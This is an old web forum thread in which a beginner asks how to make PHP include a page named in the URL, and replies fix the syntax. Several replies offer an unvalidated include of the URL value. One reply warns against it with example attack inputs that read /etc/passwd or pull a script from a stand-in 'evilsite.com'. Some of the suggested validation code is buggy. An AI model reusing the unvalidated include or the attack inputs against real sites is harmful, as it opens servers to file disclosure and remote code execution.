View previous topic :: View next topic |
Author |
Message |
browolf Trusted SF Member
Joined: 19 Apr 2002 Posts: 1
|
Posted: Sat Apr 19, 2003 11:45 am Post subject: easy php question - dynamic includes? |
|
|
i'm trying to do dynamic includes. i've looked at the manual, and googled for dynamic includes but i'm just not finding anything helpful or that explains why it isnt working.
i got a webpage
http://127.0.0.1:96/sociare/index.php?page=whatis
and the code:
Code: |
<? include($page.".php") ?>
|
but i get the error
Warning: Failed opening '.php' for inclusion (include_path='.;c:\php4\pear') in d:\wwwroot\sociare\index.php on line 17
i think this means it isnt resolving $page. a non-dynamic include earlier on the page works.
i was trying to find some helpful stuff on google on how to get stuff off the url. maybe i'm using the wrong search terms. i couldnt find it in the manual either.
i was kind of educated guessing i could just do $page. i read a bit of a php book once
i'm sure this should be easy enough
cheers.
|
|
Back to top |
|
|
Battery Powered Just Arrived
Joined: 10 Apr 2003 Posts: 0
|
Posted: Sat Apr 19, 2003 3:31 pm Post subject: |
|
|
Your code is about right, the only two things i can see wrong are:
your starting statement doesnt have 'php' in it, and
you havnt used ';' at the end
eg should be:
Code: |
<?php include($page.".php"); ?> |
the first bit, not having the 'php' can still work as im aware, but a good habbit to get into
(P.S - Your script isnt very secure atall, have you used an security measures anywhere else in the script?)
All the best,
B.P
|
|
Back to top |
|
|
ThePsyko SF Mod
Joined: 17 Oct 2002 Posts: 16777178 Location: California
|
Posted: Sat Apr 19, 2003 4:03 pm Post subject: |
|
|
Try
Code: |
<?php include( $_GET['page'] .".php" ) ?> |
Either that or enable Register Globals in the php.ini file... but it's better to get used to coding without it being enabled - otherwise if you move hosts or something, you run the risk of having to redo all your code
|
|
Back to top |
|
|
Battery Powered Just Arrived
Joined: 10 Apr 2003 Posts: 0
|
Posted: Sat Apr 19, 2003 4:11 pm Post subject: |
|
|
Just to elaborate on the security side of the script,
since there is no validation being done on $page, anyone could call the script like this (assuming register_globals is on):
index.php?page=/etc/passwd
When a non PHP file is include()'d it's displayed as HTML/Text so won't be parsed, but even worse include() allows for including remote files, imagine:
index.php?page=http://evilsite.com/evil_script.php
evil_script.php could be anything the malicious user wanted, all it would have to do is echo out some PHP code for your script to receive, and it would be run right out of your script
The solution is to validate the input, eg:
Code: |
$pages = array('whatis.php', 'whatisnt.php', 'what.php');
if( in_array($page, $pages) )
{
include($page.".php")
}
else
{
die("Nice Try!!!");
}
|
Or with ThePsyko's (better) way of doing it
Code: |
$pages = array('whatis.php', 'whatisnt.php', 'what.php');
if( in_array($page, $pages) )
{
include( include( $_GET['page'] .".php" )
}
else
{
die("Nice Try!!!");
}
|
From what you've posted already its clear that your on a windows box, so the /etc/passwd example wouldnt directly apply for you but you get the jist, but if your going to upload the script to your webserver (and its on nix) the example should of made you shiver : ))
But without validation your leaving any file open
All the best,
B.P
|
|
Back to top |
|
|
big tom Forum Fanatic
Joined: 28 May 2002 Posts: 16777215 Location: UK
|
Posted: Sat Apr 19, 2003 9:37 pm Post subject: |
|
|
or just
Code: |
<?php
$page .= ".php";
include($page);
?>
|
of course you don't want any cross server scription going on, so add this in...
Code: |
<?php
if (!$page) { $page = "start";}
$patern = "http://.+";
if (eregi($patern, $page)) {
$page = "start";
}
$page .= ".php";
include($page);
?>
|
|
|
Back to top |
|
|
browolf Trusted SF Member
Joined: 19 Apr 2002 Posts: 1
|
Posted: Sun Apr 20, 2003 4:03 pm Post subject: |
|
|
still not working.
i simplified to
Code: |
$page.=".php";
echo "page: ". $page;
|
and i get page: .php
using
Code: |
<?php include( $_GET['page'] .".php" ) ?>
|
i get a strange error msg about T_INCLUDE
i was looking for my php.ini
i dont seem to have one on my c:drive. dunno how that happened.
could this be the reason?
can php work without a php.ini?
|
|
Back to top |
|
|
big tom Forum Fanatic
Joined: 28 May 2002 Posts: 16777215 Location: UK
|
Posted: Sun Apr 20, 2003 4:11 pm Post subject: |
|
|
try just
$page .= ".php";
echo "page: $page";
personaly i don't see any need to use the dot to add the variable on the end.
|
|
Back to top |
|
|
browolf Trusted SF Member
Joined: 19 Apr 2002 Posts: 1
|
Posted: Thu May 01, 2003 5:32 pm Post subject: |
|
|
ThePsyko wrote: |
Try
Code: |
<?php include( $_GET['page'] .".php" ) ?> |
Either that or enable Register Globals in the php.ini file... but it's better to get used to coding without it being enabled - otherwise if you move hosts or something, you run the risk of having to redo all your code |
i got it working using this at work, once i'd figured out the 'php' in <?php was necessary. Guess i should reinstall php at home
cheers
|
|
Back to top |
|
|
Irenaeus Just Arrived
Joined: 15 Apr 2003 Posts: 0 Location: nottm/leeds, england
|
Posted: Thu May 01, 2003 5:43 pm Post subject: |
|
|
i used to use this, stops people wandering off...
Code: |
if($page){
if(strstr('.', $page)) {
include('./404.php');
}elseif(!file_exists('./' . $page . '.php')) {
include('./404.php');
}else {
include('./' . $page . '.php');
}
}
|
Last edited by Irenaeus on Sat Jul 09, 2005 1:27 am; edited 1 time in total |
|
Back to top |
|
|
dyn0 Just Arrived
Joined: 21 Apr 2003 Posts: 0 Location: Leeds
|
Posted: Sun May 04, 2003 12:19 pm Post subject: |
|
|
Quote: |
<?php
$page .= ".php";
include($page);
?>
|
The above code (as far as im aware) is slighty insecure because you could do www.somesite.com/somepage.php?page=/etc/passwd and such.
|
|
Back to top |
|
|
browolf Trusted SF Member
Joined: 19 Apr 2002 Posts: 1
|
Posted: Sun May 04, 2003 6:14 pm Post subject: |
|
|
i'm running php on the abyss webserver from http://www.aprelium.com/ so there isnt a etc/password
i noticed the other day you can also run ASP using ActiveHTML from http://www.selisoft.com/en/ahtml/ which is free for personal use. i always thought the only other asp was chiliasp. but Sun seems to have bought that now.
|
|
Back to top |
|
|
|